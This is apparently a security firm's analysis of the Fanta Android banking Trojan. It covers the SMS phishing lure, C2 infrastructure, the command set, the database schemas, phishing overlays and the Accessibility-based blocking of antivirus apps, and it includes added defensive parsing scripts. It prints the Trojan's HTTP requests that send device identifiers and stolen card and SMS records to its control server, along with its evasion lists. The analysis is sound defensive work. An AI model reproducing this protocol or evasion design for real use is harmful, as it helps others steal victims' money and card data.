Leysya, Fanta: a new tactic for an old Android Trojan

One day you decide to sell something on Avito and, after posting a detailed description of your item (say, a RAM module), you receive an SMS message with a link.

As soon as you open the link, you see a harmless-looking page that informs you, the lucky and successful seller, that a purchase has been made.

As soon as you tap the "Continue" button, an APK file with an attractive icon and name is downloaded to your Android device. You install the application, which for some reason asks for Accessibility Service rights; a couple of windows quickly appear and disappear, and... that's it.

You go to check your balance, but for some reason your banking app asks for your card details again. After you enter them, something frightening happens: for reasons still unknown to you, money starts disappearing from your account. You try to deal with the problem, but your phone resists: it presses the "Back" and "Home" buttons on its own, does not switch off, and does not let you enable any protective measures. As a result, you are left without money, your item has not been sold, you are confused and wondering: what happened?

The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did this happen? Let us explain.

Authors: Andrey Polovinkin, junior malware analyst; Ivan Pisarev, malware analyst.

Some statistics

The Flexnet family of Android Trojans first became known in 2015. Over its fairly long period of activity, the family has expanded into several subspecies: Fanta, Limebot, Lipton and others. Neither the Trojan nor the infrastructure around it has stood still: new, effective distribution schemes are being developed (in our case, high-quality phishing pages aimed at a specific seller), and the Trojan's developers follow the fashions of virus writing, adding new functions that make stealing money from infected devices more efficient and that bypass protection mechanisms.

The campaign described in this article targets users in Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Although Flexnet has been on the Android Trojan scene for more than four years now and has been studied in detail by many researchers, it is still in good shape. Since January 2019 the potential amount of damage has exceeded 35 million rubles, and that is only for the campaigns in Russia. In 2015 various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means the damage statistics worldwide are even more impressive. Not a bad result for such an old-timer, is it?

From a sale to a scam

The phishing page for the Avito classifieds service described above was prepared for a specific victim. Apparently the attackers use an Avito parser that extracts the seller's phone number and name together with the product description. After generating the page and preparing the APK file, the victim is sent an SMS containing their name and a link to the phishing page, which shows the description of their product and the amount supposedly received from its "sale". By pressing the button, the user receives the malicious APK file, Fanta.

Investigation of the domain shcet491[.]ru showed that it was delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the domain's main resource record (the A record) points to a server with the IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hosting provider WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the United Kingdom and belong to the hosting provider HOSTINGER. The registrar is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It should be noted that links in the following format were available on almost all of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message also fits this template. Historical data showed that a single domain matched several links of the pattern described above, which indicates that one domain was used to distribute the Trojan to several victims.
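As an added example (not code from the original article), here is a small Python matcher for the link template above, restricted to the domains listed in this section. It also accepts https and requires the seven-digit path to end at a word boundary, a slight tightening of the article's pattern; the SMS texts inside the block are constructed for the self-check and are not real messages from the campaign.

```python
import re

# Landing-page domains named in the article (defanging brackets removed so the
# regex matches the real hostnames).
LANDING_DOMAINS = [
    "shcet491.ru", "sdelka-ru.ru", "tovar-av.ru", "av-tovar.ru", "ru-sdelka.ru",
    "shcet382.ru", "sdelka221.ru", "sdelka211.ru", "vyplata437.ru",
    "viplata291.ru", "perevod273.ru", "perevod901.ru",
]

# Article template: http://(www.){0,1}<%domain%>/[0-9]{7}
# Added here: optional https and a word boundary after the seven digits, so an
# eight-digit path does not match.
LINK_RE = re.compile(
    r"https?://(?:www\.)?("
    + "|".join(re.escape(d) for d in LANDING_DOMAINS)
    + r")/(\d{7})\b"
)


def find_landing_links(text):
    """Return (domain, seven_digit_id) pairs for every campaign-style link in text."""
    return [(m.group(1), m.group(2)) for m in LINK_RE.finditer(text)]


def scan_messages(messages):
    """Map each message index to the links found in it, skipping clean messages."""
    hits = {}
    for i, msg in enumerate(messages):
        found = find_landing_links(msg)
        if found:
            hits[i] = found
    return hits


# Constructed SMS texts for a self-check; not messages from the campaign.
SAMPLE_SMS = [
    "Ivan, your item has been bought. Details: http://shcet491.ru/4815162",
    "Payment is waiting for you: http://www.perevod273.ru/9000001",
    "Your confirmation code is 1234567, do not share it",
    "See http://shcet491.ru/48151620 for details",
    "Delivery update: https://example.invalid/4815162",
]

if __name__ == "__main__":
    for idx, links in scan_messages(SAMPLE_SMS).items():
        print(idx, links)
```

The domain list is the weak part of such a rule: it only catches the infrastructure the article names, so in practice the shape of the link (short throw-away .ru domain, seven-digit path) is the more durable signal.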

Let us jump ahead a little: the Trojan downloaded via the link from the SMS uses the address onuseseddohap[.]club as its control server. The domain was registered on 2019-03-12, and starting from 2019-04-29 APK applications have interacted with it. According to data obtained from VirusTotal, a total of 109 applications have interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, which is located in the Netherlands and belongs to the hosting provider WorldStream. The registrar is Namecheap. The domains bad-racoon[.]club (from 2018-09-25) and bad-racoon[.]live (from 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the domain bad-racoon[.]club, and more than 100 with bad-racoon[.]live.

In general, the attack proceeds as described above (the original article illustrates the chain with a diagram).

What is under Fanta's hood?

Like other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of applications (including banking ones). However, the functional arsenal of this family has grown: Fanta has started using the Accessibility Service for various purposes: reading the contents of notifications from other applications, preventing the detection and termination of the Trojan on the infected device, and so on. Fanta works on all Android versions from 4.4 upward. In this article we take a detailed look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application only runs if the name of the infected device is not in the following list:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (reza)

This check is performed in the Trojan's main service, MainService. On first launch, the application's configuration parameters are initialised to their default values (the format in which the configuration is stored and the meaning of the parameters are described later), and the new infected device is registered with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the country code in which the operator is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php serves as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application stores these values as the parameters of its CnC server. The server parameter is optional: if the field is not received, Fanta uses the registration address hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address can serve two purposes: to distribute the load evenly across several servers (with a large number of infected devices, the load on an unoptimised web server can be high), and to use a backup server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.

Once the device is successfully registered, Fanta shows the user a message (a screenshot appears in the original article). Important detail: the service called System Security is the name of the Trojan's service, and after the user presses OK a window with the accessibility settings of the infected device opens, in which the user must grant Accessibility rights to the malicious service.

As soon as the user enables the Accessibility Service, Fanta gains access to the contents of application windows and to the actions performed in them.

Immediately after receiving Accessibility rights, the Trojan requests device administrator rights and the right to read notifications.

Using the Accessibility Service, the application emulates key presses, thereby granting itself all the rights it needs.

Fanta creates several database instances (described later) needed to store configuration data and the information collected from the infected device in a structured form. To send the collected data, the Trojan creates a recurring task that reads fields from the database and receives commands from the control server. The interval for contacting the CnC depends on the Android version: on 5.1 the interval is 10 seconds, otherwise 60 seconds.

To receive commands, Fanta sends a getTask request to the control server. In response, the CnC can send one of the following commands:

Command   Description
0         Send an SMS message
1         Make a phone call or execute a USSD command
2         Update the interval parameter
3         Update the intercept parameter
6         Update the smsManager parameter
9         Start collecting SMS messages
11        Reset the phone to factory settings
12        Enable/disable dialog logging

Fanta also intercepts notifications from 70 banking applications, fast payment systems and e-wallets and stores them in its database.

Storing configuration parameters

To store configuration parameters, Fanta uses the standard mechanism of the Android platform, preference files. The settings are saved to a file named settings. The stored parameters are described in the table below.

Name         Default value                   Possible values    Description
id           0                               int                Bot ID
server       hXXp://onuseseddohap[.]club/    URL                Control server address
pwd          -                               string             Server password
interval     20                              int                Time interval. Determines how long the following actions are delayed:

  • sending a request about the delivery status of a sent SMS message
  • receiving a new command from the control server

intercept    all                             all/telNumber      If the field equals the string all or a phone number, a received SMS message is intercepted by the application and not shown to the user
smsManager   0                               0/1                Enables/disables the application as the default SMS handler
readDialog   false                           true/false         Enables/disables logging of Accessibility events

Fanta also uses a file named smsManager:

Name    Default value    Possible values    Description
pckg    -                string             Package name of the SMS handler in use
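Added example, not code from the original article: a Python helper that reads a SharedPreferences XML file (the standard Android <map> layout) for the settings file above, applies the defaults from the table, and summarises what the values mean for an analyst. The sample XML is constructed with placeholder values; the key names and defaults are those in the table, and the file layout is an assumption about how the sample stores them.

```python
import xml.etree.ElementTree as ET

# Defaults from the article's settings table ("-" for pwd rendered as an empty string).
SETTINGS_DEFAULTS = {
    "id": 0,
    "server": "hXXp://onuseseddohap[.]club/",
    "pwd": "",
    "interval": 20,
    "intercept": "all",
    "smsManager": 0,
    "readDialog": False,
}


def parse_shared_prefs(xml_text):
    """Parse an Android SharedPreferences XML document into a dict.

    Assumes the standard <map> layout with <string>, <int>, <long> and
    <boolean> children; other element types are kept as raw strings.
    """
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    if root.tag != "map":
        raise ValueError("not a SharedPreferences file: root is <%s>" % root.tag)
    values = {}
    for el in root:
        name = el.get("name")
        if name is None:
            continue
        if el.tag == "string":
            values[name] = el.text or ""
        elif el.tag in ("int", "long"):
            values[name] = int(el.get("value"))
        elif el.tag == "boolean":
            values[name] = el.get("value") == "true"
        else:
            values[name] = el.get("value")
    return values


def effective_settings(xml_text):
    """Stored values layered over the table defaults (missing keys keep the default)."""
    cfg = dict(SETTINGS_DEFAULTS)
    cfg.update(parse_shared_prefs(xml_text))
    return cfg


def triage_notes(cfg):
    """Short analyst-facing statements derived from the effective settings."""
    notes = []
    if cfg["intercept"] == "all":
        notes.append("all incoming SMS are hidden from the user")
    else:
        notes.append("SMS from %s are hidden from the user" % cfg["intercept"])
    if cfg["smsManager"] == 1:
        notes.append("bot is registered as the default SMS handler")
    if cfg["readDialog"]:
        notes.append("accessibility events are being logged")
    notes.append("polls %s every %d s as bot %d" % (cfg["server"], cfg["interval"], cfg["id"]))
    return notes


# Constructed settings.xml (placeholder values, not a real recovered file).
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <int name="id" value="17" />
    <string name="server">http://example.invalid/controller.php</string>
    <string name="pwd">placeholder-pwd</string>
    <int name="interval" value="60" />
    <string name="intercept">all</string>
    <int name="smsManager" value="1" />
    <boolean name="readDialog" value="false" />
</map>
"""

if __name__ == "__main__":
    for line in triage_notes(effective_settings(SAMPLE_PREFS)):
        print(line)
```

On a device image the file would be pulled from the application's shared_prefs directory; the server value recovered this way is the one the bot actually beacons to, which may differ from the registration address because the server field of the register_bot reply can overwrite it.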

Interacting with the databases

During its operation the Trojan uses two databases. The database named a is used to store the various data collected from the phone. The second database is named fanta.db and is used to store the settings responsible for creating the phishing windows designed to collect bank card data.

The Trojan uses the database a to store the collected data and to log its own actions. The data is stored in the table logs, which is created with the following SQL query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. The first launch on the infected device, logged with the message Phone turned on!

2. Notifications from applications. The message is generated according to the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Other <%App Name%>

The message is logged in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog, in the format:

(<%Package name%>)<%Package information%>

An example of the logs table is shown as a screenshot in the original article.
One of Fanta's functions is collecting bank card data. The data is collected by creating phishing windows when a banking application is opened. The Trojan creates a phishing window only once. Information about whether a window has already been shown to the user is stored in the settings table of the fanta.db database, which is created with the following SQL query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initially set to 1 by default (create a phishing window). After the user enters their data, the value is set to 0. Examples of the settings table fields:

  • can_login - field responsible for showing the form when a banking application is opened
  • first_bank - not used
  • can_avito - field responsible for showing the form when the Avito application is opened
  • can_ali - field responsible for showing the form when the AliExpress application is opened
  • can_another - field responsible for showing the form when any application from the following list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card - field responsible for showing the form when Google Play is opened
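Added example (not code from the article or from the sample): a Python script that creates both tables with the CREATE statements quoted above, fills them with constructed rows in the record formats listed for the a database, and classifies each logs row by format. Card numbers are masked to the last four digits before they leave the parser, which is how an analyst would handle recovered victim data. The row contents are invented for the demonstration; the database names, column names and record formats are the article's. Both tables live in one in-memory connection here, whereas the sample keeps logs in a and settings in fanta.db.

```python
import re
import sqlite3

# CREATE statements exactly as the article quotes them from the sample.
CREATE_LOGS = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")
CREATE_SETTINGS = ("create table settings (can_login integer, first_bank integer, "
                   "can_alpha integer, can_avito integer, can_ali integer, "
                   "can_vtb24 integer, can_telecard integer, can_another integer, "
                   "can_card integer)")

# Record formats listed for the logs table. The timestamp is HH:mm:ss dd.MM.yyyy.
TS = r"\d{2}:\d{2}:\d{2} \d{2}\.\d{2}\.\d{4}"
CARD_RE = re.compile(r"^\[(" + TS + r")\]\((.+?)\) Номер карты:(.*?); Дата:(\d+)/(\d+); CVV: ?(.*)$")
SMS_RE = re.compile(r"^\(\[(" + TS + r")\] Тип: (Входящее|Исходящее)\) (.+?):(.*)$")
NOTIF_RE = re.compile(r"^\((.+?)\)(.*?): (.*)$")   # (<app>)<title>: <text>
DIALOG_RE = re.compile(r"^\((.+?)\)(.*)$")         # (<package>)<info>


def mask_pan(pan):
    """Keep only the last four digits of a card number before it is reported."""
    digits = re.sub(r"\D", "", pan)
    return "*" * max(len(digits) - 4, 0) + digits[-4:]


def classify_log_record(d):
    """Map one logs.d value to a typed dict; never echoes the full PAN or the CVV."""
    m = CARD_RE.match(d)
    if m:
        return {"type": "card", "time": m.group(1), "view": m.group(2),
                "pan_masked": mask_pan(m.group(3)),
                "expiry": m.group(4) + "/" + m.group(5)}
    m = SMS_RE.match(d)
    if m:
        return {"type": "sms", "time": m.group(1),
                "direction": "in" if m.group(2) == "Входящее" else "out",
                "number": m.group(3), "text": m.group(4)}
    # Notification and dialog records share the "(<name>)..." prefix; a dialog
    # whose info text contains ": " would be read as a notification here.
    m = NOTIF_RE.match(d)
    if m:
        return {"type": "notification", "app": m.group(1), "title": m.group(2), "text": m.group(3)}
    m = DIALOG_RE.match(d)
    if m:
        return {"type": "dialog", "package": m.group(1), "info": m.group(2)}
    return {"type": "other", "text": d}


# Constructed rows (d, f, p, m); the strings follow the article's formats but
# describe no real victim.
SAMPLE_LOGS = [
    ("Phone turned on!", None, None, 0),
    ("(SampleBank)Code: your one-time code is 4321", None, None, 0),
    ("[12:00:01 01.05.2019](Avito) Номер карты:4111 1111 1111 1111; Дата:12/2021; CVV: 123",
     None, None, 0),
    ("([12:05:09 01.05.2019] Тип: Входящее) +70000000000:Balance 100 RUB",
     None, "+70000000000", 1),
    ("(com.example.dialog)Some dialog text", None, None, 0),
]


def build_sample_db():
    """In-memory stand-in for the recovered contents of a and fanta.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_LOGS)
    conn.execute(CREATE_SETTINGS)
    conn.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)", SAMPLE_LOGS)
    # All flags start at 1; in this sample can_avito has already been cleared to 0.
    conn.execute("insert into settings values (1, 1, 1, 0, 1, 1, 1, 1, 1)")
    conn.commit()
    return conn


def summarize_logs(conn):
    """Count logs rows per record type."""
    counts = {}
    for (d,) in conn.execute("select d from logs order by _id"):
        t = classify_log_record(d)["type"]
        counts[t] = counts.get(t, 0) + 1
    return counts


def pending_phishing_windows(conn):
    """Names of settings flags still at 1 (phishing window not yet shown)."""
    cur = conn.execute("select * from settings")
    names = [c[0] for c in cur.description]
    row = cur.fetchone()
    return [n for n, v in zip(names, row) if v == 1 and n != "first_bank"]


if __name__ == "__main__":
    db = build_sample_db()
    print(summarize_logs(db))
    print(pending_phishing_windows(db))
```

Because rows are deleted from logs once they have been uploaded (see the setSaveInboxSms request later in the article), what remains in a recovered database is only the backlog that had not yet reached the control server; the settings flags, by contrast, record which phishing forms the victim has already filled in.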

Interacting with the control server

Network communication with the control server takes place over HTTP. For network operations Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration with the server. The server may send cookies in its responses. Fanta makes the following requests to the server:

  • Registration of the bot with the control server happens once, on first launch. The following data about the infected device is sent to the server:
    · cookie - cookies received from the server (the default value is an empty string)
    · mode - the string constant register_bot
    · prefix - the numeric constant 2
    · version_sdk - built according to the following template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI of the infected device
    · country - the country code in which the operator is registered, in ISO format
    · number - phone number
    · operator - operator name

    An example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server must return a JSON object containing the following parameters:
    · bot_id - ID of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd - password for the server.
    · server - control server address. Optional parameter. If it is not specified, the address stored in the application is used.

    Example JSON object:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request to receive a command from the server. The following data is sent to the server:
    · cookie - cookies received from the server
    · bid - ID of the infected device received in response to the register_bot request
    · pwd - password for the server
    · divice_admin - field indicating whether administrator rights have been obtained. If they have, the field equals 1, otherwise 0
    · Accessibility - status of the Accessibility Service. If the service is running, the value is 1, otherwise 0
    · SMSManager - indicates whether the Trojan is enabled as the default application for receiving SMS
    · screen - indicates the screen state. The value is set to 1 if the screen is on, otherwise 0

    An example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server can return a JSON object with different parameters:

    · Send an SMS message command: the parameters contain the phone number, the text of the SMS message and the ID of the message being sent. The identifier is used when sending a message to the server with the setSmsStatus type.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Make a phone call or USSD command: the phone number or command is delivered in the response body.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Change the interval parameter.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Change the intercept parameter.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Change the SmsManager field.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Collect SMS messages from the infected device.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Reset the phone to factory settings:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Change the ReadDialog parameter.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message with the setSmsStatus type. This request is made after the Send SMS command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the database. One row is transmitted per request. The following data is sent to the server:
    · cookie - cookies received from the server
    · mode - the string constant setSaveInboxSms
    · bid - ID of the infected device received in response to the register_bot request
    · text - text of the current database record (field d of the logs table in database a)
    · number - name of the current database record (field p of the logs table in database a)
    · sms_mode - integer value (field m of the logs table in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If the upload to the server succeeds, the row is deleted from the table. An example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
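Added example, not code from the article or from the malware: a Python decoder for the request/response exchanges described in this section, useful when reviewing captured traffic or proxy logs. It parses the form-encoded request bodies, maps the numeric mode values in getTask replies to the command names from the command table, and flags the bot_id == 0 retry condition for register_bot replies. The request bodies and JSON replies inside the block are constructed with placeholder values; only the field names and mode numbers come from the article.

```python
import json
from urllib.parse import parse_qs

# getTask command numbers and their meaning, from the article's command table.
COMMANDS = {
    0: "send SMS message",
    1: "phone call or USSD command",
    2: "update interval parameter",
    3: "update intercept parameter",
    6: "update smsManager parameter",
    9: "start collecting SMS messages",
    11: "reset phone to factory settings",
    12: "enable/disable dialog logging",
}


def parse_request_body(body):
    """Decode an x-www-form-urlencoded bot request into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def decode_response(mode, raw_json):
    """Interpret the control server's JSON reply for the request mode that triggered it.

    Returns one dict per entry in "response"; getTask entries gain an "action"
    label and register_bot entries a "retry_registration" flag.
    """
    doc = json.loads(raw_json)
    if doc.get("status") != "ok":
        raise ValueError("unexpected status: %r" % (doc.get("status"),))
    decoded = []
    for entry in doc.get("response", []):
        item = dict(entry)
        if mode == "register_bot":
            bot_id = int(item["bot_id"])
            item["retry_registration"] = (bot_id == 0)   # article: bot_id 0 => repeat request
            item["server"] = item.get("server")          # optional: None keeps the stored address
        elif mode == "getTask":
            cmd = int(item["mode"])
            item["action"] = COMMANDS.get(cmd, "unknown command %d" % cmd)
        decoded.append(item)
    return decoded


def decode_exchange(request_body, raw_json):
    """Decode one request/response pair as seen in a proxy log."""
    request = parse_request_body(request_body)
    return request, decode_response(request.get("mode"), raw_json)


# Constructed exchanges with placeholder values; field names follow the article.
REGISTER_BODY = ("mode=register_bot&prefix=2&version_sdk=TestModel/9(Avit)"
                 "&imei=000000000000000&country=ru&number=%2B70000000000&operator=TestOperator")
REGISTER_REPLY = json.dumps({"response": [{"bot_id": 17, "bot_pwd": "placeholder-pwd",
                                           "server": "http://example.invalid/controller.php"}],
                             "status": "ok"})
TASK_BODY = ("mode=getTask&bid=17&pwd=placeholder-pwd&divice_admin=1"
             "&Accessibility=1&SMSManager=0&screen=1")
TASK_REPLY = json.dumps({"response": [{"mode": 0, "sms_number": "+70000000001",
                                       "sms_text": "test", "sms_id": 5},
                                      {"mode": 2, "interval": 30}],
                         "status": "ok"})

if __name__ == "__main__":
    for body, reply in ((REGISTER_BODY, REGISTER_REPLY), (TASK_BODY, TASK_REPLY)):
        req, resp = decode_exchange(body, reply)
        print(req["mode"], resp)
```

The combination of a POST to controller.php, the okhttp/3.6.0 User-Agent and a body starting with mode=register_bot or mode=getTask is the traffic shape to look for; since the transport is plain HTTP, a proxy or NetFlow-plus-payload capture sees these bodies verbatim.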

Interacting with the Accessibility Service

The Accessibility Service was designed to make Android devices easier to use for people with disabilities. In most cases, physical interaction is required to operate an application; the Accessibility Service allows the same actions to be performed programmatically. Fanta uses the service to create fake windows in banking applications and to prevent users from opening the system settings and certain applications.

Using the Accessibility Service's functions, the Trojan monitors changes to the elements on the screen of the infected device. As described earlier, Fanta's settings contain a parameter responsible for logging actions with dialog windows, readDialog. If this parameter is set, information about the name and description of the package that triggered the event is added to the database. The Trojan performs the following actions when events occur:

  • Emulates pressing the Back and Home buttons in the following cases:
    · if the user wants to reboot the device
    · if the user wants to delete the "Avito" application or change its access rights
    · if there is a mention of the "Avito" application on the page
    · when the Google Play Protect application is opened
    · when pages with Accessibility Service settings are opened
    · when the System Security dialog appears
    · when the page with the "Draw over other apps" setting is opened
    · when the pages "Applications", "Recovery and reset", "Reset data", "Reset settings", "Developer panel", "Special. rights", "Special rights", "Special permissions" are opened
    · if the event was triggered by one of the applications from the list below.

    List of applications

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache and Junk Cleaner
    • Parental Control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • MegaFon Mobile Security
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes antivirus & protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus Free 2019 - Protection for Android
    • Antivirus Android
    • Norton Mobile Security and Antivirus
    • Antivirus, Firewall, VPN, Mobile Security
    • Mobile Security: antivirus, VPN, theft protection
    • Antivirus for Android

  • If permission is requested when sending an SMS message to a short number, Fanta emulates a click on the Remember choice checkbox and the Send button.
  • When an attempt is made to remove administrator rights from the Trojan, it locks the phone's screen.
  • Prevents new device administrators from being added.
  • If the Dr.Web antivirus application detects a threat, Fanta emulates pressing the Ignore button.
  • The Trojan emulates pressing the Back and Home buttons if the event was triggered by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card data if an application from a list of about 30 different Internet services is launched. Among them: AliExpress, Booking, Avito, the Google Play Market component, Pandao, Drom Auto and others.

    Phishing forms

    Fanta analyses which applications are running on the infected device. If an application of interest is opened, the Trojan displays a phishing window on top of all others, which is a form for entering bank card data. The user is asked to enter the following data:

    • Card number
    • Card expiry date
    • CVV
    • Cardholder name (not for all banks)

    Depending on the running application, different phishing windows are shown. The original article includes screenshots of the forms for AliExpress, for Avito, and for other applications such as Google Play Market, Aviasales, Pandao, Booking and Trivago.

    How it really happened

    Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. So the real, non-director's-cut version differs from the one told earlier: the person received an interesting SMS and then handed it over to the Group-IB Threat Hunting team. The result of the attack is this article. A happy ending, right? However, not all stories end so well, and so that yours does not turn into the director's cut with the loss of money, in most cases it is enough to follow these long-established rules:

    • do not install applications on Android devices from any source other than Google Play
    • when installing an application, pay special attention to the rights it requests
    • pay attention to the extensions of downloaded files
    • install Android OS updates regularly
    • do not visit suspicious resources and do not download files from them
    • do not follow links received in SMS messages.

source: www.habr.com